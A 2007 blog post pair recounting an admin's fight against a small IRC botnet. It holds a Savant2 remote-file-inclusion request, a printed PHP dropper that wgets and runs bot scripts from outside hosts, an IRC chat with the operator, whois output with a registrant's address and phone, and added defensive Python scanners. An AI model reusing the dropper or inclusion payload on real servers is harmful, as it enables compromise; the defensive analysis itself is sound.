
A talk with a Botnet script kiddie

2007/01/23 filed under /web

As mentioned before, I've been obsessed with stopping botnets. Well, this one in particular, operated by a script kiddie named "fazanul".

Today I've seen his attack on my machine again. And, after sending the usual abuse emails, I've decided to have a little chat with him. As I feared, this is the ultimate script kiddie. But first, a little about his latest "attack".

The attack this time was launched using a new host:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://fazanul.com/c.txt? HTTP/1.1

Fazanul.com? Interesting! This kiddie was stupid enough to register a domain. He's, however, still abusing the Savant2 hole. So who's behind fazanul.com?

$ gwhois fazanul.com
[...]
Domain Name.......... fazanul.com
Creation Date........ 2007-01-23
Registration Date.... 2007-01-23
Expiry Date.......... 2008-01-23
Organisation Name.... Stanley Livingston
Organisation Address. 455 Rose Quartz Place
Organisation Address. 
Organisation Address. Castle Rock
Organisation Address. 80108
Organisation Address. CO
Organisation Address. UNITED STATES

Admin Name........... Stanley Livingston
Admin Address........ 455 Rose Quartz Place
Admin Address........ 
Admin Address........ Castle Rock
Admin Address........ 80108
Admin Address........ CO
Admin Address........ UNITED STATES
Admin Email.......... fazanul5004@yahoo.com
Admin Phone.......... +1.9094813680
Admin Fax............ 

Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address......... 
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. 
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com

You've got to be kidding me! He registered it today! And look at that, we have fazanul5004@yahoo.com, and it looks like Yahoo is hosting this domain.

$ host fazanul.com
fazanul.com has address 68.142.212.125
fazanul.com has address 68.142.212.126
fazanul.com has address 68.142.212.127
fazanul.com has address 68.142.212.128
fazanul.com has address 68.142.212.129
fazanul.com has address 68.142.212.130
fazanul.com mail is handled by 20 mx1.biz.mail.yahoo.com.
fazanul.com mail is handled by 30 mx5.biz.mail.yahoo.com.

Ugh, yeah, the files are even hosted by Yahoo (the IPs belong to Yahoo). So those should be gone within 48 hours ;-)

So, now that we've found his domain, let's have a little chat with him. He chose Bucharest.RO.EU.Ultra-Chat.Org again as command center, yet this time the channel #out. Let's log in, and why not use the nickname Sorin (remember? ;-)

Here's what happened... enjoy (the red comments are added by me later)

<Sorin> Fazanul!
<Sorin> You're back :-)
<Sorin> Let's see how long fazanul.com will last
<fazanul> ??
<fazanul> what?
<Sorin> I've killed your MUIE botnet before ... and another one after that I
          believe ...
<Sorin> let's see how long it'll take to kill this botnet
<Sorin> But ermm, registering your domain @ yahoo?!? Are you crazy man?
<fazanul> nop
<fazanul> haking host
<Sorin> Ok ... well, let's see how long these drones here will last
<Sorin> Oh you now hack domain registry servers?
<fazanul> yeah
<Sorin> Ah ok ... somehow I have a hard time believing you. Your botnet Perl
          scripts look like crappy cut'n'paste jobs, not showing too much
          knowledge and full of script kiddie fingerprints ...
<fazanul> i have haking host and redirect and domains
<Sorin> fazanul.com has address 68.142.212.128
<fazanul> domains by yahooo
<Sorin> The whois points to yahoo, the IP points to yahoo ... so you hack
          Yahoo's Domain Registry service. Sweet
<fazanul> lollll

Yeah right ... he's registering domains through Yahoo himself now?

<Sorin> anyways, let's see how long it'll be up.
<fazanul> ok man 
<fazanul> part
<fazanul> by channels
<fazanul> i have work
<Sorin> Can't you ban me? Like usually? ;-)
<fazanul> nop
<fazanul> part you
<Sorin> Oh well, will see your next "attack" ... and remember I'll stop those
          too ;-P
<Sorin> #muie is awfully empty ...
<fazanul> yeah
<fazanul> stop

Did he just ask me to *stop* attacking his botnets?!?

<Sorin> Why? You attack my machine, I attack you. Too bad I'm a little more
          successful
<fazanul> what machine you?
<Sorin> Oh come on ... I won't tell you. That's spoiling the fun. I don't
          know your next move, you don't know my host
<fazanul> ntroduction
<fazanul> E-mail for several domains are handled by mail.b10m.net
          <212.238.141.98>, most likely the domain you've tried to reach
          too.
[snipped more info from mail.b10m.net here]

I logged in to the IRC channel from this machine (mail.b10m.net). He was clever enough to look that up. Unfortunately for him, the attacks are *not* launched on this vhost ;-)

Anyways, now we know *his* IP address: 

212.138.64.171 - - [22/Jan/2007:23:36:54 +0100] "GET / HTTP/1.0" 200 3240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9"


<fazanul> ....
<fazanul> understand
<Sorin> Oh, you got me there.
<Sorin> Darn it
<fazanul> -mail for several domains are handled by mail.b10m.net
          <212.238.141.98>
<fazanul> :))))
<fazanul> hashahahahaha

Funny, he actually pointed out a typo to me. That IP address *used* to be my IP address. Nowadays I have 217.19.21.103...

<Sorin> Ah yes ... oh well, I talk to you later then
<fazanul> to believe
<Sorin> You're too smart for me
<fazanul> :))))))))

SignOff: Sorin (fazanul ... the ultimate script kiddie)

Let's see how long this new botnet will last ... and let's see when I will meet my buddy fazaNULL again :-)


Update (2007/01/24): poor, poor fazanul. After I received a canned reply from Yahoo abuse, in which they really shared my pain of receiving spam but noted that the message really didn't originate at a Yahoo mail server (what message again?), they did act on this domain:

$ HEAD http://fazanul.com/c.txt
503 Service Temporarily Unavailable
[...]
X-Host: p10w8.geo.mud.yahoo.com
X-INKT-SITE: http://us.geocities.com/server-errors
X-INKT-URI: http://us.geocities.com/server-errors/pd_disabled.html

And sure enough, http://fazanul.com/ is pretty obvious:

Site Temporarily Disabled

This site has been temporarily disabled. If you are the owner of the site, please contact customer care.

Mission accomplished ... again ;-)

Posted by: B10m | permanent link | comments (4)

The MUIE Botnet

2007/01/23 filed under /web

Looking at your Apache logfiles can be fun. A lot of annoying people try to do all kinds of crazy stuff. Today I noticed this GET request:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://electrafusion.com/c.txt?? 
  + HTTP/1.1
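Spotting such requests is the starting point for everything in these two posts. As an added example (not code from the original posts), here is a small Python scanner over Apache combined-format log lines that flags any query parameter whose value is a remote URL and tallies the hosting domains, which are what the `host` and `whois` lookups and the abuse reports below are aimed at. The log lines are constructed, modelled on the two requests quoted in these posts; the source addresses are documentation ranges, and the hosting domains in them are the ones the posts name.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format; the trailing referer/agent pair is optional so
# "common" format lines parse as well.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def find_rfi_attempts(lines):
    """Return one finding per request in which some query parameter's value is a
    remote URL, i.e. a remote-file-inclusion probe like the ones quoted above.
    The HTTP status is kept: a 404 (the author's case) means the PHP file was
    not even there, while a 200 says nothing either way about success."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m.group("request").split()
        if len(parts) < 2:
            continue
        target = urlsplit(parts[1])
        # parse_qsl percent-decodes once; unquote again so a double-encoded
        # "http%253A%252F%252F" does not slip past the prefix test.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            decoded = unquote(value).strip()
            if decoded.lower().startswith(REMOTE_SCHEMES):
                findings.append({
                    "src_ip": m.group("ip"),
                    "time": m.group("time"),
                    "path": target.path,
                    "param": name,
                    "payload_url": decoded,
                    "payload_host": urlsplit(decoded).hostname,
                    "status": int(m.group("status")),
                })
    return findings


def payload_hosts(findings):
    """Count findings per hosting domain; these are the hosts to run `host` and
    `whois` on and to send the abuse report to, as the posts do."""
    return Counter(f["payload_host"] for f in findings)


# Constructed sample lines modelled on the two requests quoted in these posts
# (source addresses are documentation ranges, not the real ones).
SAMPLE_LOG = """\
203.0.113.7 - - [23/Jan/2007:09:12:01 +0100] "GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://fazanul.com/c.txt? HTTP/1.1" 404 312 "-" "-"
203.0.113.7 - - [23/Jan/2007:09:12:02 +0100] "GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://electrafusion.com/c.txt?? HTTP/1.1" 404 312 "-" "-"
198.51.100.9 - - [23/Jan/2007:09:15:40 +0100] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [23/Jan/2007:09:16:03 +0100] "GET /index.php?page=http%3A%2F%2Fexample.net%2Fx.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    hits = find_rfi_attempts(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f'{h["time"]} {h["src_ip"]} {h["path"]} {h["param"]}={h["payload_url"]} -> {h["status"]}')
    print("hosts to report:", dict(payload_hosts(hits)))
```

Run as a script it prints the three hits. On a real server, feed it the lines of access_log and do not filter out the 404s first: as the posts show, the probe is logged whether or not the targeted file exists, and the 404s are exactly the hits that tell you somebody is sweeping for this hole.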

Since I'm not a fan of PHP, chances are I don't have this file. And yup, I was correct. I didn't have that file. But the URI in there made me curious. What is that c.txt doing exactly?

<?
shell_exec('cd /tmp;wget http://electrafusion.com/botek.txt;
   + mv botek.txt .sessx;perl .sessx;rm botek.txt.*;
   + wget http://saids.com/a;chmod +x a;
   + mv a sess_vttn737j6k0mci66akhs5u1261;
   + ./sess_vttn737j6k0mci66akhs5u1261;
   + rm a*');
...
?>

Ah! Nice. Go to /tmp, download botek.txt from the same server (see below), move that file to .sessx and execute it. Then delete the botek.txt file, get yet another file (now from saids.com, but a non-existing file...), execute that too and delete everything.

The script is a little longer, but basically it's trying various ways to get and launch these additional files.
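To turn such a dropper into something you can act on (the URLs to report and the names the payload runs under), here is an added example, not the post's own code: a small Python parser for a `;`-separated shell chain that records fetches, follows `mv` renames and maps each executed file back to the URL it came from. The payload constant is the shell_exec() string quoted above, joined back onto one line; the set of fetchers and interpreters it recognises is an assumption, not something the post lists.

```python
import shlex
from posixpath import basename
from urllib.parse import urlsplit

# Assumed lists of commands worth tracking; extend them for what your droppers use.
FETCHERS = {"wget", "curl", "fetch", "lynx", "lwp-download", "GET"}
INTERPRETERS = {"perl", "sh", "bash", "php", "python"}
REMOTE = ("http://", "https://", "ftp://")


def _download_name(argv, url):
    """Name the fetched file gets on disk: -O/-o override, else the URL basename."""
    for flag in ("-O", "-o"):
        if flag in argv:
            i = argv.index(flag)
            if i + 1 < len(argv):
                return argv[i + 1]
    return basename(urlsplit(url).path)


def parse_dropper_chain(payload):
    """Walk a ';'-separated shell chain and return (fetched, executed):
    fetched  - the URLs pulled down, in order;
    executed - (filename, origin URL or None) for each file that is run,
               following mv renames so the executed name maps back to its URL."""
    origin = {}      # current local filename -> URL it came from
    fetched, executed = [], []
    for cmd in payload.split(";"):
        try:
            argv = shlex.split(cmd)
        except ValueError:          # unbalanced quote: fall back to whitespace split
            argv = cmd.split()
        if not argv:
            continue
        prog = argv[0]
        if prog in FETCHERS:
            for arg in argv[1:]:
                if arg.startswith(REMOTE):
                    fetched.append(arg)
                    origin[_download_name(argv, arg)] = arg
        elif prog == "mv" and len(argv) >= 3:
            src, dst = argv[1], argv[2]
            if src in origin:
                origin[dst] = origin.pop(src)
        elif prog in INTERPRETERS:
            # first non-option argument is the script being run ("perl -w x" -> "x")
            target = next((a for a in argv[1:] if not a.startswith("-")), None)
            if target is not None:
                executed.append((target, origin.get(target)))
        elif prog.startswith("./"):
            executed.append((prog[2:], origin.get(prog[2:])))
    return fetched, executed


def hosts_to_report(fetched):
    """Distinct hosting domains, i.e. the host/whois/abuse targets of the next step."""
    return sorted({urlsplit(u).hostname for u in fetched})


# The shell_exec() string from the c.txt quoted above, joined back onto one line.
PAYLOAD = ("cd /tmp;wget http://electrafusion.com/botek.txt;"
           "mv botek.txt .sessx;perl .sessx;rm botek.txt.*;"
           "wget http://saids.com/a;chmod +x a;"
           "mv a sess_vttn737j6k0mci66akhs5u1261;"
           "./sess_vttn737j6k0mci66akhs5u1261;rm a*")

if __name__ == "__main__":
    urls, runs = parse_dropper_chain(PAYLOAD)
    for name, src in runs:
        print(f"executes {name!r} (from {src})")
    print("report to:", hosts_to_report(urls))
```

The renamed-file bookkeeping is the part worth keeping: the process you will find in `ps` is called .sessx or sess_vttn737j6k0mci66akhs5u1261, not botek.txt, so without following the `mv` you cannot tie a running process back to the URL it was pulled from.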

So what does botek.txt exactly do? It opens an IRC connection to Bucharest.RO.EU.Ultra-Chat.Org. On that server (83.170.75.108), it joins the channel #muie and starts listening for commands from two nicknames (fazanul and Sorin ... our 1337 script kiddie). This is in fact rather dangerous. I doubt this botnet will be tremendously big, yet of course this "über hacker" will keep a list of vulnerable hosts. (To you system admins: check whether your Savant2_Plugin_textarea.php is vulnerable!)
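For the check the author asks system admins to do, an added example (not the post's or the component's own code): a Python audit that walks PHP sources for include/require statements whose base path is a variable that the file neither sets itself nor protects with a direct-access guard placed before the include. With register_globals on, such a variable can be filled from the query string, which is how mosConfig_absolute_path was abused here. The guard names `_VALID_MOS` (Mambo/Joomla 1.0) and `_JEXEC` (Joomla 1.5) are the conventional ones and an assumption about what the site uses; the four sample files are constructed stand-ins, not the real Savant2 source.

```python
import re

# include/require whose path starts with a PHP variable, e.g.
#   require_once($mosConfig_absolute_path . '/components/com_mtree/Savant2/Savant2_Plugin.php');
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*(\$[A-Za-z_]\w*)')
# Mambo/Joomla 1.0 and Joomla 1.5 direct-access guards (assumed to be the ones in use)
GUARD_RE = re.compile(r"""defined\s*\(\s*['"](?:_VALID_MOS|_JEXEC)['"]\s*\)""")
# plain assignment "$var = ..." (not ==, not .=)
ASSIGN_RE = re.compile(r'(\$[A-Za-z_]\w*)\s*=(?!=)')


def audit_php_source(path, source):
    """List include/require statements whose base path is a variable that this
    file neither assigns itself nor shields with a guard that runs first.
    Anything reported can be reached directly with the variable set from the
    request, which is the Savant2 hole in general form."""
    findings = []
    guard_line = None
    assigned = {}                      # variable -> first line it is assigned on
    for lineno, raw in enumerate(source.splitlines(), 1):
        line = raw.strip()
        if line.startswith(("//", "#", "*", "/*")):
            continue                   # comment line
        if guard_line is None and GUARD_RE.search(line):
            guard_line = lineno
        for m in ASSIGN_RE.finditer(line):
            assigned.setdefault(m.group(1), lineno)
        for m in INCLUDE_RE.finditer(line):
            var = m.group(1)
            if guard_line is not None and guard_line <= lineno:
                continue               # die() runs before this include on direct access
            if var in assigned and assigned[var] <= lineno:
                continue               # path computed locally, not taken from the request
            findings.append({"file": path, "line": lineno, "variable": var})
    return findings


def audit_tree(files):
    """files: mapping of path -> source text (a real run would read them from disk)."""
    out = []
    for path, src in files.items():
        out.extend(audit_php_source(path, src))
    return out


# Constructed stand-ins for the plugin file in four states (not the real source).
SAMPLE_FILES = {
    "vulnerable.php": """<?php
// unguarded: mosConfig_absolute_path comes straight from the request
require_once($mosConfig_absolute_path . '/components/com_mtree/Savant2/Savant2_Plugin.php');
class Savant2_Plugin_textarea extends Savant2_Plugin {
}
""",
    "fixed.php": """<?php
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
require_once($mosConfig_absolute_path . '/components/com_mtree/Savant2/Savant2_Plugin.php');
""",
    "late_guard.php": """<?php
require_once($mosConfig_absolute_path . '/includes/helper.php');
defined('_VALID_MOS') or die('too late: the include above already ran');
""",
    "local_path.php": """<?php
$base = dirname(__FILE__);
require_once($base . '/helper.php');
""",
}

if __name__ == "__main__":
    for f in audit_tree(SAMPLE_FILES):
        print(f'{f["file"]}:{f["line"]}: unguarded include via {f["variable"]}')
```

The late_guard.php case is the one a plain grep for `_VALID_MOS` would miss: the guard is present but runs after the include, so the file is still reachable directly. On a live site, point audit_tree at the contents of every .php file under the components directory and treat each hit as a file to patch or to block from direct access in the web server.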

I found a really easy way to get protected against these a**h*les though. Just log in to the IRC server, join #muie with a nickname like MUIE|X|\d+ (where \d+ is a random number ;-) and mock this script kiddie's Perl knowledge. Call him a script kiddie and they'll ban your IP within a minute. Woohoo! Now my server is safe from them, for my server can't log in to the channel ;)

Anyways, after spending some time in the channel, I noticed quite a few vulnerable hosts already, as this picture shows:

Sad but true ...

So who's hosting these files?

$ host electrafusion.com
electrafusion.com has address 208.179.58.67
electrafusion.com mail is handled by 10 electrafusion.com.

$ gwhois 208.179.58.67
Process query: '208.179.58.67'
[...]
OrgName:    Tierzero 
OrgID:      TIERZ
Address:    700 Wilshire Blvd.
Address:    Suite 600
City:       Los Angeles
StateProv:  CA
PostalCode: 90017
Country:    US
[...]
OrgTechHandle: TECHT-ARIN
OrgTechName:   TECH-TIERZERO 
OrgTechPhone:  +1-213-284-0555
OrgTechEmail:  ipnetworkops@tierzero.net
[...]

Start complaining! ;-) I already contacted TierZero, yet I haven't received any replies, and the files are still online :-(

The most ironic thing about this script kiddie is actually the last line of the botek.txt:

# NOTE: DONT REMOVE COPYRIGHTS

Update: TierZero did act on this botnet now:

PING electrafusion.com (208.179.58.67): 56 data bytes
36 bytes from hoanet-gw.dcap1.lax.us.tierzero.net (208.179.32.130): 
Communication prohibited by filter
Vr HL TOS  Len   ID Flg  off TTL Pro  cks      Src      Dst
 4  5  00 5400 a156   0 0000  38  01 b149 xxx.xxx.xxx.xxx  208.179.58.67 

--- electrafusion.com ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss

Of course I had to tell this Sorin the news, and this is what our conversation was like:

Sorin: w
... thinking I was a zombie, he wanted to see who was online

Me: hahaha where did electrafusion.com go? ;-P
Sorin: bitch

Update: As expected, the script kiddie found a new webserver to download the bot scripts from: http://www.depdiknas.go.id/c.txt

The domain resolves to 222.124.249.2, which belongs to TELKOMNET. abuse@telkom.net.id has been informed and hopefully will respond fast.

I figured I might also be able to get the IRC server taken down:

$ host Bucharest.RO.EU.Ultra-Chat.Org
Bucharest.RO.EU.Ultra-Chat.Org has address 83.170.75.108

$ gwhois 83.170.75.108
Process query: '83.170.75.108'
[...]
% Information related to '83.170.64.0 - 83.170.79.255'

inetnum:        83.170.64.0 - 83.170.79.255
netname:        UK2-NET
descr:          UK2.NET - UK's biggest host
country:        GB
admin-c:        BB963-RIPE
tech-c:         BB963-RIPE
rev-srv:        ns1.uk2.net
rev-srv:        ns2.uk2.net
status:         ASSIGNED PA
mnt-by:         AS13213-MNT
source:         RIPE # Filtered
[...]

This ISP has also been informed.


Update (2007/01/12): The botnet seems to have crumbled! Woohoo!

$ lwp-request -m HEAD http://www.depdiknas.go.id/c.txt
403 Forbidden
[...]

Now that the initial script cannot be called anymore, let's see what we have in our beloved #muie channel:



There are but 2 "users" in there (yes, antimuie is me ;-). Even the fazanul and Sorin nicks are no longer logged in.

Victory!

Posted by: B10m | permanent link | comments (5)